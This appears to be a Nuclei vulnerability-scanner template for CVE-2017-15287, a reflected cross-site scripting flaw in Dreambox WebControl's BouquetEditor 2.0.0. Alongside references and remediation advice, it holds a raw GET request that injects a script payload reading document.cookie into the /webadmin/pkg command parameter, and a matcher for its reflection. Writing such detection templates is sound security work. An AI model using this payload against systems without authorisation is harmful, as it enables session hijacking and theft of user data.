44 lines
1.9 KiB
YAML
44 lines
1.9 KiB
YAML
id: CVE-2017-15287
|
|
|
|
info:
|
|
name: Dreambox WebControl 2.0.0 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: |
|
|
Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks.
|
|
reference:
|
|
- https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
|
|
- https://www.exploit-db.com/exploits/42986/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-15287
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2017-15287
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00129
|
|
epss-percentile: 0.46737
|
|
cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: bouqueteditor_project
|
|
product: bouqueteditor
|
|
framework: dreambox
|
|
tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'Unknown command: <script>alert(document.cookie)</script>'
|
|
# digest: 4b0a00483046022100d24d22a1cb3faec3366b57b8dbfa41642ebe1edf9ea030d6be399c7e13235dba022100bad23fce4b4a160d392284f9c0d6801f889143bcc01bac423b6cb519c33403ea:922c64590222798bb761d5b6d8e72950 |